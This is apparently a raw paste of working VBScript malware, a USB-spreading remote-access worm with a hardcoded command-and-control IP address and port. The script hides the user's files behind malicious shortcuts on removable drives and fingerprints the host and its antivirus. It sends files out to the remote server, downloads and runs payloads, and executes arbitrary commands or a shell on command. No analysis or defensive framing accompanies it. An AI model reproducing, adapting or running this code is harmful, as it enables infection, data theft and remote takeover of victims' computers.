HMAM

1.  
2.  
3. host = "185.70.185.97"
4. port = 5555
5. installdir = "%temp%"
6. lnkfile = false
7. lnkfolder = false
8.  
9.  
10.  
11. dim shellobj
12. set shellobj = wscript.createobject("wscript.shell")
13. dim filesystemobj
14. set filesystemobj = createobject("scripting.filesystemobject")
15. dim httpobj
16. set httpobj = createobject("msxml2.xmlhttp")
17.  
18.  
19.  
20.  
21.  
22. installname = wscript.scriptname
23. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
24. if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
25. spliter = "<" & "|" & ">"
26. sleep = 5000
27. dim response
28. dim cmd
29. dim param
30. info = ""
31. usbspreading = ""
32. startdate = ""
33. dim oneonce
34.  
35.  
36. on error resume next
37.  
38.  
39. instance
40. while true
41.  
42. install
43.  
44. response = ""
45. response = post ("is-ready","")
46. cmd = split (response,spliter)
47. select case cmd (0)
48. case "excecute"
49. param = cmd (1)
50. execute param
51. case "update"
52. param = cmd (1)
53. oneonce.close
54. set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
55. oneonce.write param
56. oneonce.close
57. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
58. wscript.quit
59. case "uninstall"
60. uninstall
61. case "send"
62. download cmd (1),cmd (2)
63. case "site-send"
64. sitedownloader cmd (1),cmd (2)
65. case "recv"
66. param = cmd (1)
67. upload (param)
68. case "enum-driver"
69. post "is-enum-driver",enumdriver
70. case "enum-faf"
71. param = cmd (1)
72. post "is-enum-faf",enumfaf (param)
73. case "enum-process"
74. post "is-enum-process",enumprocess
75. case "cmd-shell"
76. param = cmd (1)
77. post "is-cmd-shell",cmdshell (param)
78. case "delete"
79. param = cmd (1)
80. deletefaf (param)
81. case "exit-process"
82. param = cmd (1)
83. exitprocess (param)
84. case "sleep"
85. param = cmd (1)
86. sleep = eval (param)
87. end select
88.  
89. wscript.sleep sleep
90.  
91. wend
92.  
93.  
94. sub install
95. on error resume next
96. dim lnkobj
97. dim filename
98. dim foldername
99. dim fileicon
100. dim foldericon
101.  
102. upstart
103. for each drive in filesystemobj.drives
104.  
105. if drive.isready = true then
106. if drive.freespace > 0 then
107. if drive.drivetype = 1 then
108. filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
109. if filesystemobj.fileexists (drive.path & "\" & installname) then
110. filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
111. end if
112. for each file in filesystemobj.getfolder( drive.path & "\" ).Files
113. if not lnkfile then exit for
114. if instr (file.name,".") then
115. if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
116. file.attributes = 2+4
117. if ucase (file.name) <> ucase (installname) then
118. filename = split(file.name,".")
119. set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
120. lnkobj.windowstyle = 7
121. lnkobj.targetpath = "cmd.exe"
122. lnkobj.workingdirectory = ""
123. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
124. fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
125. if instr (fileicon,",") = 0 then
126. lnkobj.iconlocation = file.path
127. else
128. lnkobj.iconlocation = fileicon
129. end if
130. lnkobj.save()
131. end if
132. end if
133. end if
134. next
135. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
136. if not lnkfolder then exit for
137. folder.attributes = 2+4
138. foldername = folder.name
139. set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
140. lnkobj.windowstyle = 7
141. lnkobj.targetpath = "cmd.exe"
142. lnkobj.workingdirectory = ""
143. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
144. foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
145. if instr (foldericon,",") = 0 then
146. lnkobj.iconlocation = folder.path
147. else
148. lnkobj.iconlocation = foldericon
149. end if
150. lnkobj.save()
151. next
152. end If
153. end If
154. end if
155. next
156. err.clear
157. end sub
158.  
159. sub uninstall
160. on error resume next
161. dim filename
162. dim foldername
163.  
164. filesystemobj.deletefile wscript.scriptfullname ,true
165.  
166. for each drive in filesystemobj.drives
167. if drive.isready = true then
168. if drive.freespace > 0 then
169. if drive.drivetype = 1 then
170. for each file in filesystemobj.getfolder ( drive.path & "\").files
171. on error resume next
172. if instr (file.name,".") then
173. if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
174. file.attributes = 0
175. if ucase (file.name) <> ucase (installname) then
176. filename = split(file.name,".")
177. filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
178. else
179. filesystemobj.deletefile (drive.path & "\" & file.name)
180. end If
181. else
182. filesystemobj.deletefile (file.path)
183. end if
184. end if
185. next
186. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
187. folder.attributes = 0
188. next
189. end if
190. end if
191. end if
192. next
193. wscript.quit
194. end sub
195.  
196. function post (cmd ,param)
197.  
198. post = param
199. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
200. httpobj.setrequestheader "user-agent:",information
201. httpobj.send param
202. post = httpobj.responsetext
203. end function
204.  
205. function information
206. on error resume next
207. if inf = "" then
208. inf = hwid & spliter
209. inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
210. inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
211.  
212. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
213. set os = root.execquery ("select * from win32_operatingsystem")
214. for each osinfo in os
215. inf = inf & osinfo.caption & spliter
216. exit for
217. next
218. inf = inf & "plus" & spliter
219. inf = inf & security & spliter
220. inf = inf & usbspreading
221. information = inf
222. else
223. information = inf
224. end if
225. end function
226.  
227.  
228. sub upstart ()
229. on error resume Next
230.  
231. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
232.  
233. end sub
234.  
235.  
236. function hwid
237. on error resume next
238.  
239. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
240. set disks = root.execquery ("select * from win32_logicaldisk")
241. for each disk in disks
242. if disk.volumeserialnumber <> "" then
243. hwid = disk.volumeserialnumber
244. exit for
245. end if
246. next
247. end function
248.  
249.  
250. function security
251. on error resume next
252.  
253. security = ""
254.  
255. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
256. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
257. for each objitem in colitems
258. versionstr = split (objitem.version,".")
259. next
260. versionstr = split (colitems.version,".")
261. osversion = versionstr (0) & "."
262. for x = 1 to ubound (versionstr)
263. osversion = osversion & versionstr (i)
264. next
265. osversion = eval (osversion)
266. if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
267.  
268. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
269. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
270.  
271. for each objantivirus in colantivirus
272. security = security & objantivirus.displayname & " ."
273. next
274. if security = "" then security = "nan-av"
275. end function
276.  
277.  
278. function instance
279. on error resume next
280.  
281. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
282. if usbspreading = "" then
283. if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
284. usbspreading = "true - " & date
285. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
286. else
287. usbspreading = "false - " & date
288. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
289.  
290. end if
291. end If
292.  
293.  
294.  
295. upstart
296. set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
297. set installfullnameshort = filesystemobj.getfile (installdir & installname)
298. if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
299. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
300. wscript.quit
301. end If
302. err.clear
303. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
304. if err.number > 0 then wscript.quit
305. end function
306.  
307.  
308. sub sitedownloader (fileurl,filename)
309.  
310. strlink = fileurl
311. strsaveto = installdir & filename
312. set objhttpdownload = createobject("msxml2.xmlhttp" )
313. objhttpdownload.open "get", strlink, false
314. objhttpdownload.send
315.  
316. set objfsodownload = createobject ("scripting.filesystemobject")
317. if objfsodownload.fileexists (strsaveto) then
318. objfsodownload.deletefile (strsaveto)
319. end if
320.  
321. if objhttpdownload.status = 200 then
322. dim objstreamdownload
323. set objstreamdownload = createobject("adodb.stream")
324. with objstreamdownload
325. .type = 1
326. .open
327. .write objhttpdownload.responsebody
328. .savetofile strsaveto
329. .close
330. end with
331. set objstreamdownload = nothing
332. end if
333. if objfsodownload.fileexists(strsaveto) then
334. shellobj.run objfsodownload.getfile (strsaveto).shortpath
335. end if
336. end sub
337.  
338. sub download (fileurl,filedir)
339.  
340. if filedir = "" then
341. filedir = installdir
342. end if
343.  
344. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
345. set objhttpdownload = createobject("msxml2.xmlhttp")
346. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
347. objhttpdownload.send ""
348.  
349. set objfsodownload = createobject ("scripting.filesystemobject")
350. if objfsodownload.fileexists (strsaveto) then
351. objfsodownload.deletefile (strsaveto)
352. end if
353. if objhttpdownload.status = 200 then
354. dim objstreamdownload
355. set objstreamdownload = createobject("adodb.stream")
356. with objstreamdownload
357. .type = 1
358. .open
359. .write objhttpdownload.responsebody
360. .savetofile strsaveto
361. .close
362. end with
363. set objstreamdownload = nothing
364. end if
365. if objfsodownload.fileexists(strsaveto) then
366. shellobj.run objfsodownload.getfile (strsaveto).shortpath
367. end if
368. end sub
369.  
370.  
371. function upload (fileurl)
372.  
373. dim httpobj,objstreamuploade,buffer
374. set objstreamuploade = createobject("adodb.stream")
375. with objstreamuploade
376. .type = 1
377. .open
378. .loadfromfile fileurl
379. buffer = .read
380. .close
381. end with
382. set objstreamdownload = nothing
383. set httpobj = createobject("msxml2.xmlhttp")
384. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
385. httpobj.send buffer
386. end function
387.  
388.  
389. function enumdriver ()
390.  
391. for each drive in filesystemobj.drives
392. if drive.isready = true then
393. enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
394. end if
395. next
396. end Function
397.  
398. function enumfaf (enumdir)
399.  
400. enumfaf = enumdir & spliter
401. for each folder in filesystemobj.getfolder (enumdir).subfolders
402. enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
403. next
404.  
405. for each file in filesystemobj.getfolder (enumdir).files
406. enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
407.  
408. next
409. end function
410.  
411.  
412. function enumprocess ()
413.  
414. on error resume next
415.  
416. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
417. set colitems = objwmiservice.execquery("select * from win32_process",,48)
418.  
419. dim objitem
420. for each objitem in colitems
421. enumprocess = enumprocess & objitem.name & "|"
422. enumprocess = enumprocess & objitem.processid & "|"
423. enumprocess = enumprocess & objitem.executablepath & spliter
424. next
425. end function
426.  
427. sub exitprocess (pid)
428. on error resume next
429.  
430. shellobj.run "taskkill /F /T /PID " & pid,7,true
431. end sub
432.  
433. sub deletefaf (url)
434. on error resume next
435.  
436. filesystemobj.deletefile url
437. filesystemobj.deletefolder url
438.  
439. end sub
440.  
441. function cmdshell (cmd)
442.  
443. dim httpobj,oexec,readallfromany
444.  
445. set oexec = shellobj.exec ("%comspec% /c " & cmd)
446. if not oexec.stdout.atendofstream then
447. readallfromany = oexec.stdout.readall
448. elseif not oexec.stderr.atendofstream then
449. readallfromany = oexec.stderr.readall
450. else
451. readallfromany = ""
452. end if
453.  
454. cmdshell = readallfromany
455. end function